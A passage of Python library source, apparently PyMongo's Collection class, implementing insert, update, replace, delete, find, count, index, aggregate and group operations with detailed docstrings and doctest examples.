.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_document_type("document", document)
if not (isinstance(document, RawBSONDocument) or "_id" in document):
document["_id"] = ObjectId()
with self._socket_for_writes() as sock_info:
return InsertOneResult(
self._insert(sock_info, document,
bypass_doc_val=bypass_document_validation),
self.write_concern.acknowledged)
def insert_many(self, documents, ordered=True,
bypass_document_validation=False):
"""Insert an iterable of documents.
>>> db.test.count()
0
>>> result = db.test.insert_many([{'x': i} for i in range(2)])
>>> result.inserted_ids
[ObjectId('54f113fffba522406c9cc20e'), ObjectId('54f113fffba522406c9cc20f')]
>>> db.test.count()
2
:Parameters:
- `documents`: A iterable of documents to insert.
- `ordered` (optional): If ``True`` (the default) documents will be
inserted on the server serially, in the order provided. If an error
occurs all remaining inserts are aborted. If ``False``, documents
will be inserted on the server in arbitrary order, possibly in
parallel, and all document inserts will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
:Returns:
An instance of :class:`~pymongo.results.InsertManyResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
if not isinstance(documents, collections.Iterable) or not documents:
raise TypeError("documents must be a non-empty list")
inserted_ids = []
def gen():
"""A generator that validates documents and handles _ids."""
for document in documents:
common.validate_is_document_type("document", document)
if not isinstance(document, RawBSONDocument):
if "_id" not in document:
document["_id"] = ObjectId()
inserted_ids.append(document["_id"])
yield (message._INSERT, document)
blk = _Bulk(self, ordered, bypass_document_validation)
blk.ops = [doc for doc in gen()]
blk.execute(self.write_concern.document)
return InsertManyResult(inserted_ids, self.write_concern.acknowledged)
def _update(self, sock_info, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False):
"""Internal update / replace helper."""
common.validate_boolean("upsert", upsert)
if manipulate:
document = self.__database._fix_incoming(document, self)
concern = (write_concern or self.write_concern).document
acknowledged = concern.get("w") != 0
command = SON([('update', self.name),
('ordered', ordered),
('updates', [SON([('q', criteria),
('u', document),
('multi', multi),
('upsert', upsert)])])])
if concern:
command['writeConcern'] = concern
if sock_info.max_wire_version > 1 and acknowledged:
# Update command.
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
# The command result has to be published for APM unmodified
# so we make a shallow copy here before adding updatedExisting.
result = sock_info.command(
self.__database.name,
command,
codec_options=self.__write_response_codec_options).copy()
_check_write_command_response([(0, result)])
# Add the updatedExisting field for compatibility.
if result.get('n') and 'upserted' not in result:
result['updatedExisting'] = True
else:
result['updatedExisting'] = False
# MongoDB >= 2.6.0 returns the upsert _id in an array
# element. Break it out for backward compatibility.
if 'upserted' in result:
result['upserted'] = result['upserted'][0]['_id']
return result
else:
# Legacy OP_UPDATE.
return self._legacy_write(
sock_info, 'update', command, acknowledged, op_id,
bypass_doc_val, message.update, self.__full_name, upsert,
multi, criteria, document, acknowledged, concern, check_keys,
self.__write_response_codec_options)
def replace_one(self, filter, replacement, upsert=False,
bypass_document_validation=False):
"""Replace a single document matching the filter.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
>>> result = db.test.replace_one({'x': 1}, {'y': 1})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
The *upsert* option can be used to insert a new document if a matching
document does not exist.
>>> result = db.test.replace_one({'x': 1}, {'x': 1}, True)
>>> result.matched_count
0
>>> result.modified_count
0
>>> result.upserted_id
ObjectId('54f11e5c8891e756a6e1abd4')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f11e5c8891e756a6e1abd4')}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The new document.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_replace(replacement)
with self._socket_for_writes() as sock_info:
result = self._update(sock_info, filter, replacement, upsert,
bypass_doc_val=bypass_document_validation)
return UpdateResult(result, self.write_concern.acknowledged)
def update_one(self, filter, update, upsert=False,
bypass_document_validation=False):
"""Update a single document matching the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_one({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
with self._socket_for_writes() as sock_info:
result = self._update(sock_info, filter, update, upsert,
check_keys=False,
bypass_doc_val=bypass_document_validation)
return UpdateResult(result, self.write_concern.acknowledged)
def update_many(self, filter, update, upsert=False,
bypass_document_validation=False):
"""Update one or more documents that match the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_many({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
3
>>> result.modified_count
3
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 4, u'_id': 1}
{u'x': 4, u'_id': 2}
:Parameters:
- `filter`: A query that matches the documents to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
with self._socket_for_writes() as sock_info:
result = self._update(sock_info, filter, update, upsert,
check_keys=False, multi=True,
bypass_doc_val=bypass_document_validation)
return UpdateResult(result, self.write_concern.acknowledged)
def drop(self):
"""Alias for :meth:`~pymongo.database.Database.drop_collection`.
The following two calls are equivalent:
>>> db.foo.drop()
>>> db.drop_collection("foo")
"""
self.__database.drop_collection(self.__name)
def _delete(
self, sock_info, criteria, multi,
write_concern=None, op_id=None, ordered=True):
"""Internal delete helper."""
common.validate_is_mapping("filter", criteria)
concern = (write_concern or self.write_concern).document
acknowledged = concern.get("w") != 0
command = SON([('delete', self.name),
('ordered', ordered),
('deletes', [SON([('q', criteria),
('limit', int(not multi))])])])
if concern:
command['writeConcern'] = concern
if sock_info.max_wire_version > 1 and acknowledged:
# Delete command.
result = sock_info.command(
self.__database.name,
command,
codec_options=self.__write_response_codec_options)
_check_write_command_response([(0, result)])
return result
else:
# Legacy OP_DELETE.
return self._legacy_write(
sock_info, 'delete', command, acknowledged, op_id,
False, message.delete, self.__full_name, criteria,
acknowledged, concern, self.__write_response_codec_options,
int(not multi))
def delete_one(self, filter):
"""Delete a single document matching the filter.
>>> db.test.count({'x': 1})
3
>>> result = db.test.delete_one({'x': 1})
>>> result.deleted_count
1
>>> db.test.count({'x': 1})
2
:Parameters:
- `filter`: A query that matches the document to delete.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionadded:: 3.0
"""
with self._socket_for_writes() as sock_info:
return DeleteResult(self._delete(sock_info, filter, False),
self.write_concern.acknowledged)
def delete_many(self, filter):
"""Delete one or more documents matching the filter.
>>> db.test.count({'x': 1})
3
>>> result = db.test.delete_many({'x': 1})
>>> result.deleted_count
3
>>> db.test.count({'x': 1})
0
:Parameters:
- `filter`: A query that matches the documents to delete.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionadded:: 3.0
"""
with self._socket_for_writes() as sock_info:
return DeleteResult(self._delete(sock_info, filter, True),
self.write_concern.acknowledged)
def find_one(self, filter=None, *args, **kwargs):
"""Get a single document from the database.
All arguments to :meth:`find` are also valid arguments for
:meth:`find_one`, although any `limit` argument will be
ignored. Returns a single document, or ``None`` if no matching
document is found.
The :meth:`find_one` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a dictionary specifying
the query to be performed OR any other type to be used as
the value for a query for ``"_id"``.
- `*args` (optional): any additional positional arguments
are the same as the arguments to :meth:`find`.
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to :meth:`find`.
- `max_time_ms` (optional): a value for max_time_ms may be
specified as part of `**kwargs`, e.g.
>>> find_one(max_time_ms=100)
"""
if (filter is not None and not
isinstance(filter, collections.Mapping)):
filter = {"_id": filter}
max_time_ms = kwargs.pop("max_time_ms", None)
cursor = self.find(filter,
*args, **kwargs).max_time_ms(max_time_ms)
for result in cursor.limit(-1):
return result
return None
def find(self, *args, **kwargs):
"""Query the database.
The `filter` argument is a prototype document that all results
must match. For example:
>>> db.test.find({"hello": "world"})
only matches documents that have a key "hello" with value
"world". Matches can have other keys *in addition* to
"hello". The `projection` argument is used to specify a subset
of fields that should be included in the result documents. By
limiting results to a certain subset of fields you can cut
down on network traffic and decoding time.
Raises :class:`TypeError` if any of the arguments are of
improper type. Returns an instance of
:class:`~pymongo.cursor.Cursor` corresponding to this query.
The :meth:`find` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a SON object specifying elements which
must be present for a document to be included in the
result set
- `projection` (optional): a list of field names that should be
returned in the result set or a dict specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `skip` (optional): the number of documents to omit (from
the start of the result set) when returning the results
- `limit` (optional): the maximum number of results to
return
- `no_cursor_timeout` (optional): if False (the default), any
returned cursor is closed by the server after 10 minutes of
inactivity. If set to True, the returned cursor will never
time out on the server. Care should be taken to ensure that
cursors with no_cursor_timeout turned on are properly closed.
- `cursor_type` (optional): the type of cursor to return. The valid
options are defined by :class:`~pymongo.cursor.CursorType`:
- :attr:`~pymongo.cursor.CursorType.NON_TAILABLE` - the result of
this find call will return a standard cursor over the result set.
- :attr:`~pymongo.cursor.CursorType.TAILABLE` - the result of this
find call will be a tailable cursor - tailable cursors are only
for use with capped collections. They are not closed when the
last data is retrieved but are kept open and the cursor location
marks the final document position. If more data is received
iteration of the cursor will continue from the last document
received. For details, see the `tailable cursor documentation
<http://www.mongodb.org/display/DOCS/Tailable+Cursors>`_.
- :attr:`~pymongo.cursor.CursorType.TAILABLE_AWAIT` - the result
of this find call will be a tailable cursor with the await flag
set. The server will wait for a few seconds after returning the
full result set so that it can capture and return additional data
added during the query.
- :attr:`~pymongo.cursor.CursorType.EXHAUST` - the result of this
find call will be an exhaust cursor. MongoDB will stream batched
results to the client without waiting for the client to request
each batch, reducing latency. See notes on compatibility below.
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for this query. See
:meth:`~pymongo.cursor.Cursor.sort` for details.
- `allow_partial_results` (optional): if True, mongos will return
partial results if some shards are down instead of returning an
error.
- `oplog_replay` (optional): If True, set the oplogReplay query
flag.
- `modifiers` (optional): A dict specifying the MongoDB `query
modifiers`_ that should be used for this query. For example::
>>> db.test.find(modifiers={"$maxTimeMS": 500})
- `batch_size` (optional): Limits the number of documents returned in
a single batch.
- `manipulate` (optional): **DEPRECATED** - If True (the default),
apply any outgoing SON manipulators before returning.
.. note:: There are a number of caveats to using
:attr:`~pymongo.cursor.CursorType.EXHAUST` as cursor_type:
- The `limit` option can not be used with an exhaust cursor.
- Exhaust cursors are not supported by mongos and can not be
used with a sharded cluster.
- A :class:`~pymongo.cursor.Cursor` instance created with the
:attr:`~pymongo.cursor.CursorType.EXHAUST` cursor_type requires an
exclusive :class:`~socket.socket` connection to MongoDB. If the
:class:`~pymongo.cursor.Cursor` is discarded without being
completely iterated the underlying :class:`~socket.socket`
connection will be closed and discarded without being returned to
the connection pool.
.. versionchanged:: 3.0
Changed the parameter names `spec`, `fields`, `timeout`, and
`partial` to `filter`, `projection`, `no_cursor_timeout`, and
`allow_partial_results` respectively.
Added the `cursor_type`, `oplog_replay`, and `modifiers` options.
Removed the `network_timeout`, `read_preference`, `tag_sets`,
`secondary_acceptable_latency_ms`, `max_scan`, `snapshot`,
`tailable`, `await_data`, `exhaust`, `as_class`, and slave_okay
parameters. Removed `compile_re` option: PyMongo now always
represents BSON regular expressions as :class:`~bson.regex.Regex`
objects. Use :meth:`~bson.regex.Regex.try_compile` to attempt to
convert from a BSON regular expression to a Python regular
expression object. Soft deprecated the `manipulate` option.
.. versionchanged:: 2.7
Added `compile_re` option. If set to False, PyMongo represented BSON
regular expressions as :class:`~bson.regex.Regex` objects instead of
attempting to compile BSON regular expressions as Python native
regular expressions, thus preventing errors for some incompatible
patterns, see `PYTHON-500`_.
.. versionadded:: 2.3
The `tag_sets` and `secondary_acceptable_latency_ms` parameters.
.. _PYTHON-500: https://jira.mongodb.org/browse/PYTHON-500
.. _query modifiers:
http://docs.mongodb.org/manual/reference/operator/query-modifier/
.. mongodoc:: find
"""
return Cursor(self, *args, **kwargs)
def parallel_scan(self, num_cursors):
"""Scan this entire collection in parallel.
Returns a list of up to ``num_cursors`` cursors that can be iterated
concurrently. As long as the collection is not modified during
scanning, each document appears once in one of the cursors result
sets.
For example, to process each document in a collection using some
thread-safe ``process_document()`` function:
>>> def process_cursor(cursor):
... for document in cursor:
... # Some thread-safe processing function:
... process_document(document)
>>>
>>> # Get up to 4 cursors.
...
>>> cursors = collection.parallel_scan(4)
>>> threads = [
... threading.Thread(target=process_cursor, args=(cursor,))
... for cursor in cursors]
>>>
>>> for thread in threads:
... thread.start()
>>>
>>> for thread in threads:
... thread.join()
>>>
>>> # All documents have now been processed.
The :meth:`parallel_scan` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `num_cursors`: the number of cursors to return
.. note:: Requires server version **>= 2.5.5**.
.. versionchanged:: 3.0
Removed support for arbitrary keyword arguments, since
the parallelCollectionScan command has no optional arguments.
"""
cmd = SON([('parallelCollectionScan', self.__name),
('numCursors', num_cursors)])
with self._socket_for_reads() as (sock_info, slave_ok):
result = self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern)
return [CommandCursor(self, cursor['cursor'], sock_info.address)
for cursor in result['cursors']]
def _count(self, cmd):
"""Internal count helper."""
with self._socket_for_reads() as (sock_info, slave_ok):
res = self._command(
sock_info, cmd, slave_ok,
allowable_errors=["ns missing"],
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern)
if res.get("errmsg", "") == "ns missing":
return 0
return int(res["n"])
def count(self, filter=None, **kwargs):
"""Get the number of documents in this collection.
All optional count parameters should be passed as keyword arguments
to this method. Valid options include:
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
- `limit` (int): The maximum number of documents to count.
- `skip` (int): The number of matching documents to skip before
returning results.
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
The :meth:`count` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): A query document that selects which documents
to count in the collection.
- `**kwargs` (optional): See list of options above.
"""
cmd = SON([("count", self.__name)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
cmd.update(kwargs)
return self._count(cmd)
def create_indexes(self, indexes):
"""Create one or more indexes on this collection.
>>> from pymongo import IndexModel, ASCENDING, DESCENDING
>>> index1 = IndexModel([("hello", DESCENDING),
... ("world", ASCENDING)], name="hello_world")
>>> index2 = IndexModel([("goodbye", DESCENDING)])
>>> db.test.create_indexes([index1, index2])
["hello_world"]
:Parameters:
- `indexes`: A list of :class:`~pymongo.operations.IndexModel`
instances.
.. note:: `create_indexes` uses the ``createIndexes`` command
introduced in MongoDB **2.6** and cannot be used with earlier
versions.
.. versionadded:: 3.0
"""
if not isinstance(indexes, list):
raise TypeError("indexes must be a list")
names = []
def gen_indexes():
for index in indexes:
if not isinstance(index, IndexModel):
raise TypeError("%r is not an instance of "
"pymongo.operations.IndexModel" % (index,))
document = index.document
names.append(document["name"])
yield document
cmd = SON([('createIndexes', self.name),
('indexes', list(gen_indexes()))])
with self._socket_for_writes() as sock_info:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY)
return names
def __create_index(self, keys, index_options):
"""Internal create index helper.
:Parameters:
- `keys`: a list of tuples [(key, type), (key, type), ...]
- `index_options`: a dict of index options.
"""
index_doc = helpers._index_document(keys)
index = {"key": index_doc}
index.update(index_options)
with self._socket_for_writes() as sock_info:
cmd = SON([('createIndexes', self.name), ('indexes', [index])])
try:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY)
except OperationFailure as exc:
if exc.code in common.COMMAND_NOT_FOUND_CODES:
index["ns"] = self.__full_name
wcn = (self.write_concern if
self.write_concern.acknowledged else WriteConcern())
self.__database.system.indexes._insert(
sock_info, index, True, False, False, wcn)
else:
raise
def create_index(self, keys, **kwargs):
"""Creates an index on this collection.
Takes either a single key or a list of (key, direction) pairs.
The key(s) must be an instance of :class:`basestring`
(:class:`str` in python 3), and the direction(s) must be one of
(:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`,
:data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`,
:data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`,
:data:`~pymongo.TEXT`).
To create a single key ascending index on the key ``'mike'`` we just
use a string argument::
>>> my_collection.create_index("mike")
For a compound index on ``'mike'`` descending and ``'eliot'``
ascending we need to use a list of tuples::
>>> my_collection.create_index([("mike", pymongo.DESCENDING),
... ("eliot", pymongo.ASCENDING)])
All optional index creation parameters should be passed as
keyword arguments to this method. For example::
>>> my_collection.create_index([("mike", pymongo.DESCENDING)],
... background=True)
Valid options include, but are not limited to:
- `name`: custom name to use for this index - if none is
given, a name will be generated.
- `unique`: if ``True`` creates a uniqueness constraint on the index.
- `background`: if ``True`` this index should be created in the
background.
- `sparse`: if ``True``, omit from the index any documents that lack
the indexed field.
- `bucketSize`: for use with geoHaystack indexes.
Number of documents to group together within a certain proximity
to a given longitude and latitude.
- `min`: minimum value for keys in a :data:`~pymongo.GEO2D`
index.
- `max`: maximum value for keys in a :data:`~pymongo.GEO2D`
index.
- `expireAfterSeconds`: <int> Used to create an expiring (TTL)
collection. MongoDB will automatically delete documents from
this collection after <int> seconds. The indexed field must
be a UTC datetime or the data will not expire.
- `partialFilterExpression`: A document that specifies a filter for
a partial index.
See the MongoDB documentation for a full list of supported options by
server version.
.. warning:: `dropDups` is not supported by MongoDB 3.0 or newer. The
option is silently ignored by the server and unique index builds
using the option will fail if a duplicate value is detected.
.. note:: `partialFilterExpression` requires server version **>= 3.2**
:Parameters:
- `keys`: a single key or a list of (key, direction)
pairs specifying the index to create
- `**kwargs` (optional): any additional index creation
options (see the above list) should be passed as keyword
arguments
.. versionchanged:: 3.2
Added partialFilterExpression to support partial indexes.
.. versionchanged:: 3.0
Renamed `key_or_list` to `keys`. Removed the `cache_for` option.
:meth:`create_index` no longer caches index names. Removed support
for the drop_dups and bucket_size aliases.
.. mongodoc:: indexes
"""
keys = helpers._index_list(keys)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
self.__create_index(keys, kwargs)
return name
def ensure_index(self, key_or_list, cache_for=300, **kwargs):
"""**DEPRECATED** - Ensures that an index exists on this collection.
.. versionchanged:: 3.0
**DEPRECATED**
"""
warnings.warn("ensure_index is deprecated. Use create_index instead.",
DeprecationWarning, stacklevel=2)
# The types supported by datetime.timedelta.
if not (isinstance(cache_for, integer_types) or
isinstance(cache_for, float)):
raise TypeError("cache_for must be an integer or float.")
if "drop_dups" in kwargs:
kwargs["dropDups"] = kwargs.pop("drop_dups")
if "bucket_size" in kwargs:
kwargs["bucketSize"] = kwargs.pop("bucket_size")
keys = helpers._index_list(key_or_list)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
# Note that there is a race condition here. One thread could
# check if the index is cached and be preempted before creating
# and caching the index. This means multiple threads attempting
# to create the same index concurrently could send the index
# to the server two or more times. This has no practical impact
# other than wasted round trips.
if not self.__database.client._cached(self.__database.name,
self.__name, name):
self.__create_index(keys, kwargs)
self.__database.client._cache_index(self.__database.name,
self.__name, name, cache_for)
return name
return None
def drop_indexes(self):
"""Drops all indexes on this collection.
Can be used on non-existant collections or collections with no indexes.
Raises OperationFailure on an error.
"""
self.__database.client._purge_index(self.__database.name, self.__name)
self.drop_index("*")
def drop_index(self, index_or_name):
"""Drops the specified index on this collection.
Can be used on non-existant collections or collections with no
indexes. Raises OperationFailure on an error (e.g. trying to
drop an index that does not exist). `index_or_name`
can be either an index name (as returned by `create_index`),
or an index specifier (as passed to `create_index`). An index
specifier should be a list of (key, direction) pairs. Raises
TypeError if index is not an instance of (str, unicode, list).
.. warning::
if a custom name was used on index creation (by
passing the `name` parameter to :meth:`create_index` or
:meth:`ensure_index`) the index **must** be dropped by name.
:Parameters:
- `index_or_name`: index (or name of index) to drop
"""
name = index_or_name
if isinstance(index_or_name, list):
name = helpers._gen_index_name(index_or_name)
if not isinstance(name, string_type):
raise TypeError("index_or_name must be an index name or list")
self.__database.client._purge_index(
self.__database.name, self.__name, name)
cmd = SON([("dropIndexes", self.__name), ("index", name)])
with self._socket_for_writes() as sock_info:
self._command(sock_info,
cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=["ns not found"])
def reindex(self):
"""Rebuilds all indexes on this collection.
.. warning:: reindex blocks all other operations (indexes
are built in the foreground) and will be slow for large
collections.
"""
cmd = SON([("reIndex", self.__name)])
with self._socket_for_writes() as sock_info:
return self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY)
def list_indexes(self):
"""Get a cursor over the index documents for this collection.
>>> for index in db.test.list_indexes():
... print(index)
...
SON([(u'v', 1), (u'key', SON([(u'_id', 1)])),
(u'name', u'_id_'), (u'ns', u'test.test')])
:Returns:
An instance of :class:`~pymongo.command_cursor.CommandCursor`.
.. versionadded:: 3.0
"""
codec_options = CodecOptions(SON)
coll = self.with_options(codec_options)
with self._socket_for_primary_reads() as (sock_info, slave_ok):
cmd = SON([("listIndexes", self.__name), ("cursor", {})])
if sock_info.max_wire_version > 2:
cursor = self._command(sock_info, cmd, slave_ok,
ReadPreference.PRIMARY,
codec_options)["cursor"]
return CommandCursor(coll, cursor, sock_info.address)
else:
namespace = _UJOIN % (self.__database.name, "system.indexes")
res = helpers._first_batch(
sock_info, self.__database.name, "system.indexes",
{"ns": self.__full_name}, 0, slave_ok, codec_options,
ReadPreference.PRIMARY, cmd,
self.database.client._event_listeners)
data = res["data"]
cursor = {
"id": res["cursor_id"],
"firstBatch": data,
"ns": namespace,
}
# Note that a collection can only have 64 indexes, so we don't
# technically have to pass len(data) here. There will never be
# an OP_GET_MORE call.
return CommandCursor(
coll, cursor, sock_info.address, len(data))
def index_information(self):
"""Get information on this collection's indexes.
Returns a dictionary where the keys are index names (as
returned by create_index()) and the values are dictionaries
containing information about each index. The dictionary is
guaranteed to contain at least a single key, ``"key"`` which
is a list of (key, direction) pairs specifying the index (as
passed to create_index()). It will also contain any other
metadata about the indexes, except for the ``"ns"`` and
``"name"`` keys, which are cleaned. Example output might look
like this:
>>> db.test.ensure_index("x", unique=True)
u'x_1'
>>> db.test.index_information()
{u'_id_': {u'key': [(u'_id', 1)]},
u'x_1': {u'unique': True, u'key': [(u'x', 1)]}}
"""
cursor = self.list_indexes()
info = {}
for index in cursor:
index["key"] = index["key"].items()
index = dict(index)
info[index.pop("name")] = index
return info
def options(self):
"""Get the options set on this collection.
Returns a dictionary of options and their values - see
:meth:`~pymongo.database.Database.create_collection` for more
information on the possible options. Returns an empty
dictionary if the collection has not been created yet.
"""
with self._socket_for_primary_reads() as (sock_info, slave_ok):
if sock_info.max_wire_version > 2:
criteria = {"name": self.__name}
else:
criteria = {"name": self.__full_name}
cursor = self.__database._list_collections(sock_info,
slave_ok,
criteria)
result = None
for doc in cursor:
result = doc
break
if not result:
return {}
options = result.get("options", {})
if "create" in options:
del options["create"]
return options
def aggregate(self, pipeline, **kwargs):
"""Perform an aggregation using the aggregation framework on this
collection.
All optional aggregate parameters should be passed as keyword arguments
to this method. Valid options include, but are not limited to:
- `allowDiskUse` (bool): Enables writing to temporary files. When set
to True, aggregation stages can write data to the _tmp subdirectory
of the --dbpath directory. The default is False.
- `maxTimeMS` (int): The maximum amount of time to allow the operation
to run in milliseconds.
- `batchSize` (int): The maximum number of documents to return per
batch. Ignored if the connected mongod or mongos does not support
returning aggregate results using a cursor, or `useCursor` is
``False``.
- `useCursor` (bool): Requests that the `server` provide results
using a cursor, if possible. Ignored if the connected mongod or
mongos does not support returning aggregate results using a cursor.
The default is ``True``. Set this to ``False`` when upgrading a 2.4
or older sharded cluster to 2.6 or newer (see the warning below).
The :meth:`aggregate` method obeys the :attr:`read_preference` of this
:class:`Collection`. Please note that using the ``$out`` pipeline stage
requires a read preference of
:attr:`~pymongo.read_preferences.ReadPreference.PRIMARY` (the default).
The server will raise an error if the ``$out`` pipeline stage is used
with any other read preference.
.. warning:: When upgrading a 2.4 or older sharded cluster to 2.6 or
newer the `useCursor` option **must** be set to ``False``
until all shards have been upgraded to 2.6 or newer.
.. note:: This method does not support the 'explain' option. Please
use :meth:`~pymongo.database.Database.command` instead. An
example is included in the :ref:`aggregate-examples` documentation.
:Parameters:
- `pipeline`: a list of aggregation pipeline stages
- `**kwargs` (optional): See list of options above.
:Returns:
A :class:`~pymongo.command_cursor.CommandCursor` over the result
set.
.. versionchanged:: 3.0
The :meth:`aggregate` method always returns a CommandCursor. The
pipeline argument must be a list.
.. versionchanged:: 2.7
When the cursor option is used, return
:class:`~pymongo.command_cursor.CommandCursor` instead of
:class:`~pymongo.cursor.Cursor`.
.. versionchanged:: 2.6
Added cursor support.
.. versionadded:: 2.3
.. seealso:: :doc:`/examples/aggregation`
.. _aggregate command:
http://docs.mongodb.org/manual/applications/aggregation
"""
if not isinstance(pipeline, list):
raise TypeError("pipeline must be a list")
if "explain" in kwargs:
raise ConfigurationError("The explain option is not supported. "
"Use Database.command instead.")
cmd = SON([("aggregate", self.__name),
("pipeline", pipeline)])
# Remove things that are not command options.
batch_size = common.validate_positive_integer_or_none(
"batchSize", kwargs.pop("batchSize", None))
use_cursor = common.validate_boolean(
"useCursor", kwargs.pop("useCursor", True))
# If the server does not support the "cursor" option we
# ignore useCursor and batchSize.
with self._socket_for_reads() as (sock_info, slave_ok):
if sock_info.max_wire_version > 0:
if use_cursor:
if "cursor" not in kwargs:
kwargs["cursor"] = {}
if batch_size is not None:
kwargs["cursor"]["batchSize"] = batch_size
cmd.update(kwargs)
# Apply this Collection's read concern if $out is not in the
# pipeline.
if sock_info.max_wire_version >= 4 and 'readConcern' not in cmd:
if pipeline and '$out' in pipeline[-1]:
result = self._command(sock_info, cmd, slave_ok)
else:
result = self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern)
else:
result = self._command(sock_info, cmd, slave_ok)
if "cursor" in result:
cursor = result["cursor"]
else:
# Pre-MongoDB 2.6. Fake a cursor.
cursor = {
"id": 0,
"firstBatch": result["result"],
"ns": self.full_name,
}
return CommandCursor(
self, cursor, sock_info.address).batch_size(batch_size or 0)
# key and condition ought to be optional, but deprecation
# would be painful as argument order would have to change.
def group(self, key, condition, initial, reduce, finalize=None, **kwargs):
"""Perform a query similar to an SQL *group by* operation.
Returns an array of grouped items.
The `key` parameter can be:
- ``None`` to use the entire document as a key.
- A :class:`list` of keys (each a :class:`basestring`
(:class:`str` in python 3)) to group by.
- A :class:`basestring` (:class:`str` in python 3), or
:class:`~bson.code.Code` instance containing a JavaScript
function to be applied to each document, returning the key
to group by.
The :meth:`group` method obeys the :attr:`read_preference` of this
:class:`Collection`.
:Parameters:
- `key`: fields to group by (see above description)
- `condition`: specification of rows to be
considered (as a :meth:`find` query specification)
- `initial`: initial value of the aggregation counter object
- `reduce`: aggregation function as a JavaScript string
- `finalize`: function to be called on each object in output list.
- `**kwargs` (optional): additional arguments to the group command
may be passed as keyword arguments to this helper method
.. versionchanged:: 2.2
Removed deprecated argument: command
"""
group = {}
if isinstance(key, string_type):
group["$keyf"] = Code(key)
elif key is not None:
group = {"key": helpers._fields_list_to_dict(key, "key")}
group["ns"] = self.__name
group["$reduce"] = Code(reduce)
group["cond"] = condition
group["initial"] = initial
if finalize is not None:
group["finalize"] = Code(finalize)
cmd = SON([("group", group)])
cmd.update(kwargs)
with self._socket_for_reads() as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok)["retval"]
